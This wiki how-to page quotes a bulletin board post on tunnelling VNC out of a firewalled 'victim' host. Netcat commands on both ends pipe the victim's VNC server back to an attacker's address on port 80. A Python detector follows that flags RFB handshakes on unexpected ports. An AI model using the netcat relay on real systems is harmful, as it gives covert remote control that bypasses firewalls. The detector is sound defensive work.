VNC

  • On a server without a monitor, add “beep -l 900 -r 3 -f 500” to /etc/rc.local to hear when the system is up

NC and VNC

  • Copied from a bulletin board post

Here you have a very simple method to establish an inside-out connection from a natted/firewalled victim host to the attacker... Nothing new... maybe, the possibility to have a nice interactive session with the support of VNC... useful on Windows boxes ;-) “I love NetCat”

Just look at this:

Victim(private IP) —— Firewall —— (Internet) —— Attacker(public IP)

  1. VNC server listening on port 134 (victim)
  2. nc -l -p 5900 | nc -l -p 80 (attacker)
  3. nc IP_attacker 80 | nc localhost 134 (victim)
  4. VNC client connecting to localhost 5900 (attacker)

  1. Start the VNC server on the victim host listening on some port (I like 134)
  2. Start netcat on the attacker host listening on port 5900 and pipe to another netcat listening on port 80
  3. Launch a netcat on the victim host to the IP of the attacker on port 80 and pipe to a netcat connecting to the same machine on port 134
  4. Start the VNC client on the attacker machine and connect to localhost on port 5900

This is how the connection is established:

The VNC client of the attacker connects to port 5900 of its machine; a netcat listening on that port receives the connection and pipes its output to the input of another netcat on the same machine listening on port 80. When a netcat on the victim machine connects to the attacker machine on port 80, it receives through this socket the output of the VNC client and pipes it to the input of another netcat on the victim machine that is connected to the VNC server on port 134.
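Seen from the defender's side, VNC traffic carried over port 80 or another unexpected port still opens with the RFB ProtocolVersion message ("RFB xxx.yyy\n"), so the first payload bytes of a flow give it away. The Python below is an added example, not part of the bulletin board post; the flow tuples, the documentation addresses and the expected VNC port range are constructed assumptions.

```python
import re

# RFB ProtocolVersion message that opens every VNC session: "RFB xxx.yyy\n".
RFB_BANNER = re.compile(rb"^RFB (\d{3})\.(\d{3})\n")
# First bytes of an HTTP/1.x request line or status line.
HTTP_START = re.compile(
    rb"^(?:(?:GET|HEAD|POST|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT) \S+ HTTP/1\.[01]\r\n"
    rb"|HTTP/1\.[01] \d{3} )"
)
VNC_PORTS = range(5900, 6000)  # assumption: ports where VNC is expected on this network


def classify(dst_port, first_bytes):
    """Return a finding for one flow's first payload bytes, or None."""
    m = RFB_BANNER.match(first_bytes)
    if m:
        if dst_port in VNC_PORTS:
            return None  # VNC where VNC is expected
        return f"RFB {int(m.group(1))}.{int(m.group(2))} handshake on port {dst_port}"
    if dst_port == 80 and first_bytes and not HTTP_START.match(first_bytes):
        return "non-HTTP payload on port 80"
    return None


def scan(flows):
    """Return (src, dst, dst_port, finding) for every flow that stands out."""
    return [
        (src, dst, port, finding)
        for src, dst, port, data in flows
        if (finding := classify(port, data))
    ]


# Constructed sample flows (documentation addresses, not captured traffic):
# (source, destination, destination port, first payload bytes seen)
SAMPLE_FLOWS = [
    ("192.0.2.10", "203.0.113.5", 80, b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n"),
    ("192.0.2.23", "203.0.113.9", 80, b"RFB 003.008\n"),
    ("192.0.2.23", "192.0.2.40", 5900, b"RFB 003.008\n"),
    ("192.0.2.31", "203.0.113.9", 80, b"\x01\x00\x00\x00\x00\x00"),
    ("192.0.2.31", "192.0.2.40", 134, b"RFB 003.003\n"),
]

if __name__ == "__main__":
    for src, dst, port, finding in scan(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{port}  {finding}")
```

In practice the first payload bytes would come from a flow or packet capture tool; an egress proxy that only passes well-formed HTTP blocks both flagged cases on port 80.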

 
howto/vnc.txt · Last modified: 2008/06/02 03:13 by 96.234.159.102
 